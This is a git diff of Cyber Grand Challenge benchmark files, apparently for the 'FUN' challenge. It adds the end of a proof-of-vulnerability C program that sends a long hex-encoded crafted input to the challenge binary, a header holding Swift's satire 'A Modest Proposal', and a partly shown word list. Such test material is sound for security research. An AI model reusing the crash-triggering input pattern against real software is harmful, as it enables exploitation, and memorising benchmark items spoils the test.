"\x37\x36\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x37" + "\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x37\x38" + "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x37\x39\xff" + "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x30\xff\x43" + "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x31\xff\x43\x26" + "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x32\xff\x43\x26\x46" + "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x33\xff\x43\x26\x46\x38" + "\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x34\xff\x43\x26\x46\x38\x09" + "\x68\x65\x6c\x6c\x6f\x32\x33\x38\x35\xff\x43\x26\x46\x38\x09\x68" + "\x65\x6c\x6c\x6f\x32\x33\x38\x36\xff\x43\x26\x46\x38\x09\x68\x65" + "\x6c\x6c\x6f\x32\x33\x38\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c" + "\x6c\x6f\x32\x33\x38\x38\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" + "\x6f\x32\x33\x38\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" + "\x32\x33\x39\x30\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" + "\x33\x39\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33" + "\x39\x32\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39" + "\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x34" + "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x35\xff" + "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x36\xff\x43" + "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x37\xff\x43\x26" + "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x38\xff\x43\x26\x46" + "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x39\xff\x43\x26\x46\x38" + "\x09\x68\x65\x6c\x6c\x6f\x32\x34\x30\x30\xff\x43\x26\x46\x38\x09" + "\x68\x65\x6c\x6c\x6f\x32\x34\x30\x31\xff\x43\x26\x46\x38\x09\x68" + "\x65\x6c\x6c\x6f\x32\x34\x30\x32\xff\x43\x26\x46\x38\x09\x68\x65" + "\x6c\x6c\x6f\x32\x34\x30\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c" + "\x6c\x6f\x32\x34\x30\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" + "\x6f\x32\x34\x30\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" + "\x32\x34\x30\x36\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" + "\x34\x30\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34" + "\x30\x38\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x30" + "\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x30" + "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x31\xff" + "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x32\xff\x43" + "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x33\xff\x43\x26" + "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x34\xff\x43\x26\x46" + "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x35\xff\x43\x26\x46\x38" + "\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x36\xff\x43\x26\x46\x38\x09" + "\x68\x65\x6c\x6c\x6f\x32\x34\x31\x37\xff\x43\x26\x46\x38\x09\x68" + "\x65\x6c\x6c\x6f\x32\x34\x31\x38\xff\x43\x26\x46\x38\x09\x68\x65" + "\x6c\x6c\x6f\x32\x34\x31\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c" + "\x6c\x6f\x32\x34\x32\x30\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" + "\x6f\x32\x34\x32\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" + "\x32\x34\x32\x32\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" + "\x34\x32\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34" + "\x32\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x32" + "\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x32\x36" + "\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84" + "\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84" + "\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\x0a"; + static unsigned int write_00000_00000_len = 35343; + unsigned char *write_00000 = NULL; + unsigned int write_00000_len = 0; + write_00000 = cgc_append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); + if (write_00000_len > 0) { + cgc_transmit_all(1, write_00000, write_00000_len); + } + cgc_free(write_00000); + } while (0); + do { + unsigned char *read_00000; + unsigned int read_00000_len; + unsigned int read_00000_ptr = 0; + //**** length read + read_00000_len = 2500; + read_00000 = (unsigned char*)cgc_malloc(read_00000_len); + int read_00000_res = cgc_length_read(0, read_00000, read_00000_len); + if (read_00000_res) {} //silence unused variable warning + /* read match pcre: +[\x00\x01]* +*/ + static char read_00000_00000_regex[] = + "\x5b\x5c\x78\x30\x30\x5c\x78\x30\x31\x5d\x2a"; + static match_result read_00000_00000_match; + pcre *read_00000_00000_pcre = cgc_init_regex(read_00000_00000_regex); + if (read_00000_00000_pcre != NULL) { + int rc = cgc_regex_match(read_00000_00000_pcre, 0, read_00000 + read_00000_ptr, read_00000_len - read_00000_ptr, &read_00000_00000_match); + if (rc > 0) { + read_00000_ptr += read_00000_00000_match.match_end - read_00000_00000_match.match_start; + } + else { + //this is a pov so what does this even mean? + //why would we quit on failed match, just keep sending stuff. + } + pcre_free(read_00000_00000_pcre); + } + else { + //this is a pov so what does this even mean? + //why would we quit on failed regex compile, just keep sending stuff. + } + cgc_free(read_00000); + if (read_00000_ptr) {} //silence unused variable warning if any + } while (0); +} diff --git a/exclude/FUN/src/cgc_text.h b/exclude/FUN/src/cgc_text.h new file mode 100644 index 000000000..283793c08 --- /dev/null +++ b/exclude/FUN/src/cgc_text.h @@ -0,0 +1,289 @@ +const char cgc_text[] = "It is a melancholy object to those, who walk through this great town, " \ +"or travel in the country, when they see the streets, the roads and " \ +"cabbin-doors crowded with beggars of the female sex, followed by three, " \ +"four, or six children, all in rags, and importuning every passenger for " \ +"an alms. These mothers instead of being able to work for their honest " \ +"livelihood, are forced to employ all their time in stroling to beg " \ +"sustenance for their helpless infants who, as they grow up, either turn " \ +"thieves for want of work, or leave their dear native country, to fight " \ +"for the Pretender in Spain, or sell themselves to the Barbadoes. " \ +"I think it is agreed by all parties, that this prodigious number of " \ +"children in the arms, or on the backs, or at the heels of their mothers, " \ +"and frequently of their fathers, is in the present deplorable state of " \ +"the kingdom, a very great additional grievance; and therefore whoever " \ +"could find out a fair, cheap and easy method of making these children " \ +"sound and useful members of the common-wealth, would deserve so well of " \ +"the publick, as to have his statue set up for a preserver of the nation. " \ +"But my intention is very far from being confined to provide only for the " \ +"children of professed beggars: it is of a much greater extent, and shall " \ +"take in the whole number of infants at a certain age, who are born of " \ +"parents in effect as little able to support them, as those who demand " \ +"our charity in the streets. " \ +"As to my own part, having turned my thoughts for many years, upon this " \ +"important subject, and maturely weighed the several schemes of " \ +"our projectors, I have always found them grossly mistaken in their " \ +"computation. It is true, a child just dropt from its dam, may be " \ +"supported by her milk, for a solar year, with little other nourishment: " \ +"at most not above the value of two shillings, which the mother may " \ +"certainly get, or the value in scraps, by her lawful occupation of " \ +"begging; and it is exactly at one year old that I propose to provide for " \ +"them in such a manner, as, instead of being a charge upon their parents, " \ +"or the parish, or wanting food and raiment for the rest of their lives, " \ +"they shall, on the contrary, contribute to the feeding, and partly to " \ +"the cloathing of many thousands. " \ +"There is likewise another great advantage in my scheme, that it will " \ +"prevent those voluntary abortions, and that horrid practice of " \ +"women murdering their bastard children, alas! too frequent among us, " \ +"sacrificing the poor innocent babes, I doubt, more to avoid the expence " \ +"than the shame, which would move tears and pity in the most savage and " \ +"inhuman breast. " \ +"The number of souls in this kingdom being usually reckoned one million " \ +"and a half, of these I calculate there may be about two hundred thousand " \ +"couple whose wives are breeders; from which number I subtract thirty " \ +"thousand couple, who are able to maintain their own children, (although " \ +"I apprehend there cannot be so many, under the present distresses of " \ +"the kingdom) but this being granted, there will remain an hundred and " \ +"seventy thousand breeders. I again subtract fifty thousand, for those " \ +"women who miscarry, or whose children die by accident or disease within " \ +"the year. There only remain an hundred and twenty thousand children of " \ +"poor parents annually born. The question therefore is, How this number " \ +"shall be reared, and provided for? which, as I have already said, under " \ +"the present situation of affairs, is utterly impossible by all the " \ +"methods hitherto proposed. For we can neither employ them in handicraft " \ +"or agriculture; we neither build houses, (I mean in the country) nor " \ +"cultivate land: they can very seldom pick up a livelihood by stealing " \ +"till they arrive at six years old; except where they are of towardly " \ +"parts, although I confess they learn the rudiments much earlier; " \ +"during which time they can however be properly looked upon only as " \ +"probationers: As I have been informed by a principal gentleman in the " \ +"county of Cavan, who protested to me, that he never knew above one or " \ +"two instances under the age of six, even in a part of the kingdom so " \ +"renowned for the quickest proficiency in that art. " \ +"I am assured by our merchants, that a boy or a girl before twelve years " \ +"old, is no saleable commodity, and even when they come to this age, they " \ +"will not yield above three pounds, or three pounds and half a crown " \ +"at most, on the exchange; which cannot turn to account either to the " \ +"parents or kingdom, the charge of nutriments and rags having been at " \ +"least four times that value. " \ +"I shall now therefore humbly propose my own thoughts, which I hope will " \ +"not be liable to the least objection. " \ +"I have been assured by a very knowing American of my acquaintance in " \ +"London, that a young healthy child well nursed, is, at a year old, a " \ +"most delicious nourishing and wholesome food, whether stewed, roasted, " \ +"baked, or boiled; and I make no doubt that it will equally serve in a " \ +"fricasie, or a ragoust. " \ +"I do therefore humbly offer it to publick consideration, that of the " \ +"hundred and twenty thousand children, already computed, twenty thousand " \ +"may be reserved for breed, whereof only one fourth part to be males; " \ +"which is more than we allow to sheep, black cattle, or swine, and my " \ +"reason is, that these children are seldom the fruits of marriage, a " \ +"circumstance not much regarded by our savages, therefore, one male will " \ +"be sufficient to serve four females. That the remaining hundred thousand " \ +"may, at a year old, be offered in sale to the persons of quality and " \ +"fortune, through the kingdom, always advising the mother to let them " \ +"suck plentifully in the last month, so as to render them plump, and fat " \ +"for a good table. A child will make two dishes at an entertainment for " \ +"friends, and when the family dines alone, the fore or hind quarter will " \ +"make a reasonable dish, and seasoned with a little pepper or salt, will " \ +"be very good boiled on the fourth day, especially in winter. " \ +"I have reckoned upon a medium, that a child just born will weigh 12 " \ +"pounds, and in a solar year, if tolerably nursed, encreaseth to 28 " \ +"pounds. " \ +"I grant this food will be somewhat dear, and therefore very proper for " \ +"landlords, who, as they have already devoured most of the parents, seem " \ +"to have the best title to the children. " \ +"Infant's flesh will be in season throughout the year, but more plentiful " \ +"in March, and a little before and after; for we are told by a grave " \ +"author, an eminent French physician, that fish being a prolifick dyet, " \ +"there are more children born in Roman Catholick countries about nine " \ +"months after Lent, the markets will be more glutted than usual, because " \ +"the number of Popish infants, is at least three to one in this kingdom, " \ +"and therefore it will have one other collateral advantage, by lessening " \ +"the number of Papists among us. " \ +"I have already computed the charge of nursing a beggar's child (in which " \ +"list I reckon all cottagers, labourers, and four-fifths of the farmers) " \ +"to be about two shillings per annum, rags included; and I believe no " \ +"gentleman would repine to give ten shillings for the carcass of a good " \ +"fat child, which, as I have said, will make four dishes of excellent " \ +"nutritive meat, when he hath only some particular friend, or his " \ +"own family to dine with him. Thus the squire will learn to be a good " \ +"landlord, and grow popular among his tenants, the mother will have eight " \ +"shillings neat profit, and be fit for work till she produces another " \ +"child. " \ +"Those who are more thrifty (as I must confess the times require) may " \ +"flea the carcass; the skin of which, artificially dressed, will make " \ +"admirable gloves for ladies, and summer boots for fine gentlemen. " \ +"As to our City of Dublin, shambles may be appointed for this purpose, in " \ +"the most convenient parts of it, and butchers we may be assured will not " \ +"be wanting; although I rather recommend buying the children alive, and " \ +"dressing them hot from the knife, as we do roasting pigs. " \ +"A very worthy person, a true lover of his country, and whose virtues " \ +"I highly esteem, was lately pleased, in discoursing on this matter, to " \ +"offer a refinement upon my scheme. He said, that many gentlemen of this " \ +"kingdom, having of late destroyed their deer, he conceived that the " \ +"want of venison might be well supply'd by the bodies of young lads and " \ +"maidens, not exceeding fourteen years of age, nor under twelve; so great " \ +"a number of both sexes in every country being now ready to starve for " \ +"want of work and service: And these to be disposed of by their parents " \ +"if alive, or otherwise by their nearest relations. But with due " \ +"deference to so excellent a friend, and so deserving a patriot, I " \ +"cannot be altogether in his sentiments; for as to the males, my American " \ +"acquaintance assured me from frequent experience, that their flesh was " \ +"generally tough and lean, like that of our school-boys, by continual " \ +"exercise, and their taste disagreeable, and to fatten them would not " \ +"answer the charge. Then as to the females, it would, I think, with " \ +"humble submission, be a loss to the publick, because they soon would " \ +"become breeders themselves: And besides, it is not improbable that some " \ +"scrupulous people might be apt to censure such a practice, (although " \ +"indeed very unjustly) as a little bordering upon cruelty, which, I " \ +"confess, hath always been with me the strongest objection against any " \ +"project, how well soever intended. " \ +"But in order to justify my friend, he confessed, that this expedient " \ +"was put into his head by the famous Salmanaazor, a native of the island " \ +"Formosa, who came from thence to London, above twenty years ago, and in " \ +"conversation told my friend, that in his country, when any young person " \ +"happened to be put to death, the executioner sold the carcass to persons " \ +"of quality, as a prime dainty; and that, in his time, the body of a " \ +"plump girl of fifteen, who was crucified for an attempt to poison the " \ +"Emperor, was sold to his imperial majesty's prime minister of state, and " \ +"other great mandarins of the court in joints from the gibbet, at four " \ +"hundred crowns. Neither indeed can I deny, that if the same use were " \ +"made of several plump young girls in this town, who without one single " \ +"groat to their fortunes, cannot stir abroad without a chair, and appear " \ +"at a play-house and assemblies in foreign fineries which they never will " \ +"pay for; the kingdom would not be the worse. " \ +"Some persons of a desponding spirit are in great concern about that vast " \ +"number of poor people, who are aged, diseased, or maimed; and I have " \ +"been desired to employ my thoughts what course may be taken, to ease " \ +"the nation of so grievous an incumbrance. But I am not in the least pain " \ +"upon that matter, because it is very well known, that they are every day " \ +"dying, and rotting, by cold and famine, and filth, and vermin, as fast " \ +"as can be reasonably expected. And as to the young labourers, they " \ +"are now in almost as hopeful a condition. They cannot get work, and " \ +"consequently pine away from want of nourishment, to a degree, that if " \ +"at any time they are accidentally hired to common labour, they have not " \ +"strength to perform it, and thus the country and themselves are happily " \ +"delivered from the evils to come. " \ +"I have too long digressed, and therefore shall return to my subject. I " \ +"think the advantages by the proposal which I have made are obvious and " \ +"many, as well as of the highest importance. " \ +"For first, as I have already observed, it would greatly lessen the " \ +"number of Papists, with whom we are yearly over-run, being the principal " \ +"breeders of the nation, as well as our most dangerous enemies, and who " \ +"stay at home on purpose with a design to deliver the kingdom to the " \ +"Pretender, hoping to take their advantage by the absence of so many good " \ +"Protestants, who have chosen rather to leave their country, than stay at " \ +"home and pay tithes against their conscience to an episcopal curate. " \ +"Secondly, The poorer tenants will have something valuable of their own, " \ +"which by law may be made liable to a distress, and help to pay their " \ +"landlord's rent, their corn and cattle being already seized, and money a " \ +"thing unknown. " \ +"Thirdly, Whereas the maintainance of an hundred thousand children, " \ +"from two years old, and upwards, cannot be computed at less than " \ +"ten shillings a piece per annum, the nation's stock will be thereby " \ +"encreased fifty thousand pounds per annum, besides the profit of a " \ +"new dish, introduced to the tables of all gentlemen of fortune in the " \ +"kingdom, who have any refinement in taste. And the money will circulate " \ +"among our selves, the goods being entirely of our own growth and " \ +"manufacture. " \ +"Fourthly, The constant breeders, besides the gain of eight shillings " \ +"sterling per annum by the sale of their children, will be rid of the " \ +"charge of maintaining them after the first year. " \ +"Fifthly, This food would likewise bring great custom to taverns, " \ +"where the vintners will certainly be so prudent as to procure the best " \ +"receipts for dressing it to perfection; and consequently have their " \ +"houses frequented by all the fine gentlemen, who justly value themselves " \ +"upon their knowledge in good eating; and a skilful cook, who understands " \ +"how to oblige his guests, will contrive to make it as expensive as they " \ +"please. " \ +"Sixthly, This would be a great inducement to marriage, which all wise " \ +"nations have either encouraged by rewards, or enforced by laws and " \ +"penalties. It would encrease the care and tenderness of mothers towards " \ +"their children, when they were sure of a settlement for life to the " \ +"poor babes, provided in some sort by the publick, to their annual profit " \ +"instead of expence. We should soon see an honest emulation among the " \ +"married women, which of them could bring the fattest child to the " \ +"market. Men would become as fond of their wives, during the time of " \ +"their pregnancy, as they are now of their mares in foal, their cows in " \ +"calf, or sow when they are ready to farrow; nor offer to beat or kick " \ +"them (as is too frequent a practice) for fear of a miscarriage. " \ +"Many other advantages might be enumerated. For instance, the addition " \ +"of some thousand carcasses in our exportation of barrel'd beef: the " \ +"propagation of swine's flesh, and improvement in the art of making good " \ +"bacon, so much wanted among us by the great destruction of pigs, " \ +"too frequent at our tables; which are no way comparable in taste or " \ +"magnificence to a well grown, fat yearly child, which roasted whole will " \ +"make a considerable figure at a Lord Mayor's feast, or any other publick " \ +"entertainment. But this, and many others, I omit, being studious of " \ +"brevity. " \ +"Supposing that one thousand families in this city, would be constant " \ +"customers for infants flesh, besides others who might have it at merry " \ +"meetings, particularly at weddings and christenings, I compute that " \ +"Dublin would take off annually about twenty thousand carcasses; and the " \ +"rest of the kingdom (where probably they will be sold somewhat cheaper) " \ +"the remaining eighty thousand. " \ +"I can think of no one objection, that will possibly be raised against " \ +"this proposal, unless it should be urged, that the number of people will " \ +"be thereby much lessened in the kingdom. This I freely own, and 'twas " \ +"indeed one principal design in offering it to the world. I desire the " \ +"reader will observe, that I calculate my remedy for this one individual " \ +"Kingdom of Ireland, and for no other that ever was, is, or, I think, " \ +"ever can be upon Earth. Therefore let no man talk to me of other " \ +"expedients: Of taxing our absentees at five shillings a pound: Of using " \ +"neither cloaths, nor houshold furniture, except what is of our " \ +"own growth and manufacture: Of utterly rejecting the materials and " \ +"instruments that promote foreign luxury: Of curing the expensiveness of " \ +"pride, vanity, idleness, and gaming in our women: Of introducing a vein " \ +"of parsimony, prudence and temperance: Of learning to love our " \ +"country, wherein we differ even from Laplanders, and the inhabitants " \ +"of Topinamboo: Of quitting our animosities and factions, nor acting any " \ +"longer like the Jews, who were murdering one another at the very moment " \ +"their city was taken: Of being a little cautious not to sell our country " \ +"and consciences for nothing: Of teaching landlords to have at least one " \ +"degree of mercy towards their tenants. Lastly, of putting a spirit of " \ +"honesty, industry, and skill into our shop-keepers, who, if a resolution " \ +"could now be taken to buy only our native goods, would immediately unite " \ +"to cheat and exact upon us in the price, the measure, and the goodness, " \ +"nor could ever yet be brought to make one fair proposal of just dealing, " \ +"though often and earnestly invited to it. " \ +"Therefore I repeat, let no man talk to me of these and the like " \ +"expedients, 'till he hath at least some glympse of hope, that there will " \ +"ever be some hearty and sincere attempt to put them into practice. " \ +"But, as to my self, having been wearied out for many years with offering " \ +"vain, idle, visionary thoughts, and at length utterly despairing of " \ +"success, I fortunately fell upon this proposal, which, as it is wholly " \ +"new, so it hath something solid and real, of no expence and little " \ +"trouble, full in our own power, and whereby we can incur no danger " \ +"in disobliging England. For this kind of commodity will not bear " \ +"exportation, and flesh being of too tender a consistence, to admit a " \ +"long continuance in salt, although perhaps I could name a country, which " \ +"would be glad to eat up our whole nation without it. " \ +"After all, I am not so violently bent upon my own opinion, as to reject " \ +"any offer, proposed by wise men, which shall be found equally innocent, " \ +"cheap, easy, and effectual. But before something of that kind shall be " \ +"advanced in contradiction to my scheme, and offering a better, I desire " \ +"the author or authors will be pleased maturely to consider two points. " \ +"First, As things now stand, how they will be able to find food and " \ +"raiment for a hundred thousand useless mouths and backs. And secondly, " \ +"There being a round million of creatures in humane figure throughout " \ +"this kingdom, whose whole subsistence put into a common stock, would " \ +"leave them in debt two million of pounds sterling, adding those who are " \ +"beggars by profession, to the bulk of farmers, cottagers and labourers, " \ +"with their wives and children, who are beggars in effect; I desire " \ +"those politicians who dislike my overture, and may perhaps be so bold " \ +"to attempt an answer, that they will first ask the parents of these " \ +"mortals, whether they would not at this day think it a great happiness " \ +"to have been sold for food at a year old, in the manner I prescribe, and " \ +"thereby have avoided such a perpetual scene of misfortunes, as they have " \ +"since gone through, by the oppression of landlords, the impossibility of " \ +"paying rent without money or trade, the want of common sustenance, with " \ +"neither house nor cloaths to cover them from the inclemencies of the " \ +"weather, and the most inevitable prospect of intailing the like, or " \ +"greater miseries, upon their breed for ever. " \ +"I profess, in the sincerity of my heart, that I have not the least " \ +"personal interest in endeavouring to promote this necessary work, having " \ +"no other motive than the publick good of my country, by advancing " \ +"our trade, providing for infants, relieving the poor, and giving some " \ +"pleasure to the rich. I have no children, by which I can propose to " \ +"get a single penny; the youngest being nine years old, and my wife past " \ +"child-bearing. "; diff --git a/exclude/FUN/src/cgc_words_r.h b/exclude/FUN/src/cgc_words_r.h new file mode 100644 index 000000000..ca8a00e7b --- /dev/null +++ b/exclude/FUN/src/cgc_words_r.h @@ -0,0 +1,11738 @@ +static const char *words[12000] = { + "lighthearted", + "housebroken", + "crown princess", + "include", + "countenance", + "boozer", + "carve", + "cheesecloth", + "fanciful", + "butterfingers", + "ambitious", + "he'd", + "gutsy", + "local", + "fluidity", + "low-paid", + "fallacious", + "chilly", + "dirty", + "cutlery", + "empress", + "bigot", + "gulch", + "incessantly", + "exhaust", + "lotion", + "carnivore", + "bigamy", + "emerge", + "bikini", + "excitement", + "lose", + "Episcopal Church", + "fool", + "ambush", + "fare", + "fractionally", + "ethereal", + "gesticulate", + "epaulet", + "communicable", + "continuity", + "inoculation", + "excrete", + "contradictory", + "assignment", + "ecological", + "inflict", + "loyal", + "free will", + "educational", + "faculty", + "business administration", + "Europe", + "hang", + "lily", + "foliage", + "humanize", + "brief", + "grand piano", + "computation", + "camellia", + "disapprovingly", + "heartbreaking", + "litigation", + "algebra", + "C-section", + "ABC", + "heyday", + "grin", + "bedpan", + "fog", + "akin", + "long-range", + "at", + "clutches", + "delay", + "hen", + "godforsaken", + "disclose", + "backlash", + "duffel bag", + "biting", + "elevation", + "discord", + "gnat", + "effort", + "hot seat", + "creditable", + "croon", + "equator", + "dilute", + "duplicate", + "funeral director", + "apartheid", + "family values", + "abashed", + "footage", + "lost", + "detain", + "journalism", + "Caucasian", + "blot", + "hangers-on", + "intelligible", + "looter", + "arraignment", + "easygoing", + "aerodynamic", + "doesn't", + "guy", + "flub", + "dismissal", + "lucidity", + "informed", + "forgery", + "indifferently", + "hot tub", + "marinade", + "inequity", + "indelibly", + "limousine", + "imaginable", + "chicken pox", + "acquisition", + "delayed", + "hijacker", + "edible", + "expenses", + "he", + "dolly", + "big cheese", + "developing", + "glare", + "dissolve", + "forfeit", + "christening", + "avarice", + "devious", + "forte", + "forward-looking", + "abhorrent", + "alleviate", + "hairy", + "distinction", + "franc", + "convoluted", + "four-letter word", + "mallet", + "anatomy", + "arsenal", + "class", + "courageously", + "exit", + "laundry room", + "kid", + "associate professor", + "guzzler", + "jest", + "first aid", + "irritation", + "inconspicuous", + "avalanche", + "Democrat", + "cornerstone", + "heel", + "infertile", + "in-house", + "inhospitable", + "count", + "extremity", + "consume", + "hoe", + "insect", + "disdain", + "Antarctic", + "hospitalization", + "glasses", + "combine", + "judiciary", + "carelessness", + "jubilant", + "brash", + "classic", + "crucifixion", + "impossibility", + "call", + "covertly", + "flying", + "chip", + "agonizingly", + "albeit", + "beside", + "die", + "homework", + "intestine", + "curve", + "aside", + "bonfire", + "Inc.", + "geometrically", + "construct", + "justify", + "generation gap", + "currency", + "imitation", + "frustrated", + "horoscope", + "distinctively", + "anyway", + "am", + "abominable", + "imperialism", + "discouraged", + "concrete", + "counselor", + "arise", + "creole", + "desecrate", + "essential", + "darken", + "field day", + "confine", + "blowtorch", + "forlorn", + "full-time", + "craft", + "Dumpster", + "ingratitude", + "fatality", + "imperial", + "exclusively", + "blank check", + "elementary school", + "Antarctica", + "arm", + "convey", + "appearance", + "gerrymandering", + "frankness", + "heavens", + "French bread", + "Achilles' heel", + "frizz", + "mammal", + "Black", + "heave", + "deportation", + "gestation", + "guaranty", + "assertiveness", + "flowerbed", + "headlines", + "headhunter", + "inflationary", + "bulletproof", + "learn", + "foreclose", + "joyriding", + "colorful", + "dreadfully", + "adequately", + "assembly line", + "insistently", + "cover", + "dilemma", + "dawn", + "battered", + "land mine", + "junk", + "glandular", + "flour", + "intermarriage", + "donate", + "almost", + "loft", + "life preserver", + "decrease", + "inscribe", + "leek", + "ambassador", + "dismally", + "fossil fuel", + "fingerprint", + "choice", + "gonna", + "fart", + "funnel cloud", + "large-scale", + "favoritism", + "hale", + "diseased", + "inaccurate", + "crate", + "bird", + "athlete", + "evade", + "gelding", + "atheist", + "handbook", + "hangover", + "affectionately", + "mar", + "killing", + "cavalry", + "ago", + "manslaughter", + "lottery", + "accreditation", + "cloth", + "bylaw", + "disclaim", + "budding", + "croak", + "hernia", + "audacity", + "avoid", + "circumstance", + "fetch", + "magician", + "dump truck", + "consolation", + "genital", + "foreground", + "cleanse", + "displace", + "host", + "catnip", + "knuckle", + "grad school", + "briny", + "curt", + "affectation", + "madness", + "incorporated", + "bumper sticker", + "electrician", + "expose", + "astutely", + "believable", + "cultural", + "lubrication", + "imbue", + "ink", + "humdrum", + "lunatic", + "keenness", + "depressed", + "injurious", + "bored", + "calibrate", + "hark", + "aimlessly", + "leapt", + "elicit", + "convoy", + "kowtow", + "Jew", + "impale", + "axle", + "derision", + "icing", + "accord", + "expressway", + "homeroom", + "hit-and-run", + "chiffon", + "halibut", + "eyebrow", + "entirely", + "habitual", + "girder", + "immune system", + "competitor", + "inherent", + "diction", + "acclaimed", + "context", + "curable", + "high roller", + "capital letter", + "alcohol", + "government", + "luxuriate", + "canvass", + "death penalty", + "hanger-on", + "corpulent", + "ace", + "cherish", + "inconclusive", + "decoration", + "hatchet", + "appallingly", + "cheapskate", + "aboard", + "defamation", + "indicator", + "amid", + "inexpensively", + "footwork", + "gristle", + "drive", + "elopement", + "justifiably", + "furl", + "blizzard", + "illegible", + "gentle", + "booze", + "kung fu", + "endow", + "aid", + "epic", + "furor", + "dole", + "diagnostic", + "insulate", + "drinking", + "involve", + "baby boom", + "buffoon", + "cinnamon", + "college", + "broad-minded", + "exhilarating", + "estimated", + "levitation", + "Deep South", + "conditionally", + "crisply", + "char", + "equine", + "frivolously", + "hash browns", + "ID card", + "jig", + "intentional", + "biscuit", + "credible", + "laborious", + "explanatory", + "dawdle", + "disclosure", + "long johns", + "cottonwood", + "clear", + "carrier", + "cobblestone", + "halftime", + "chide", + "incisive", + "lob", + "freeload", + "electrode", + "brag", + "dangerously", + "flagstone", + "announce", + "capriciously", + "hookey", + "crackdown", + "combatant", + "grand total", + "congratulatory", + "faultless", + "burglary", + "humbly", + "fluoride", + "inland", + "affect", + "embryo", + "h'm", + "fireplace", + "constipation", + "dew", + "likable", + "electoral", + "credit", + "downplay", + "Mars", + "coagulation", + "airliner", + "gloat", + "comeuppance", + "cast-iron", + "admonish", + "highlighter", + "carpeted", + "doomed", + "grayish", + "accommodation", + "affirmatively", + "cobweb", + "exhaustively", + "contention", + "infliction", + "apparition", + "lonesome", + "anguish", + "coward", + "chairwoman", + "bologna", + "customarily", + "enchanting", + "maid of honor", + "jaw", + "improperly", + "entrance ramp", + "handlebar", + "authorization", + "beginner", + "groupie", + "inflexibly", + "exploratory", + "gleaming", + "flash flood", + "depend", + "gruffly", + "guileless", + "glisten", + "competence", + "hyperactive", + "enjoyable", + "garish", + "collaborate", + "amazingly", + "absent-minded", + "elude", + "electric", + "drawing", + "childproof", + "buff", + "abbreviation", + "astringent", + "alkali", + "adoption", + "bestial", + "hatchback", + "allay", + "credibility", + "foretaste", + "exceptionally", + "aesthetics", + "dehydration", + "company", + "guzzle", + "deacon", + "inefficiently", + "majorly", + "compulsive", + "brokerage", + "chin", + "Good Friday", + "correlate", + "abacus", + "bore", + "categorically", + "fez", + "actuality", + "cirrhosis", + "compelling", + "gauche", + "debt", + "lumbering", + "adjournment", + "engender", + "blatant", + "hard currency", + "marketable", + "disbelief", + "home", + "delicious", + "godmother", + "confidential", + "bead", + "advent", + "macrocosm", + "howdy", + "incorporate", + "landlady", + "knotty", + "devoutly", + "beautifully", + "cervical", + "contrast", + "frail", + "Down's syndrome", + "behalf", + "attentively", + "coworker", + "cherub", + "disfigure", + "fix", + "hesitate", + "fax", + "indecency", + "foyer", + "emphatic", + "cadaver", + "chipmunk", + "fathom", + "freshwater", + "h", + "balm", + "internship", + "attainable", + "fluctuate", + "are", + "downright", + "gullibility", + "inkling", + "cooperation", + "bachelor", + "fourthly", + "hankie", + "indictment", + "lover", + "gradient", + "hitch", + "gassy", + "computer", + "broke", + "fortune", + "brighten", + "gaseous", + "crook", + "health food", + "languorous", + "hound", + "disproportionately", + "humanist", + "homeowner", + "burning", + "gasket", + "deign", + "brothel", + "leggy", + "jockey", + "ambivalent", + "juncture", + "embezzle", + 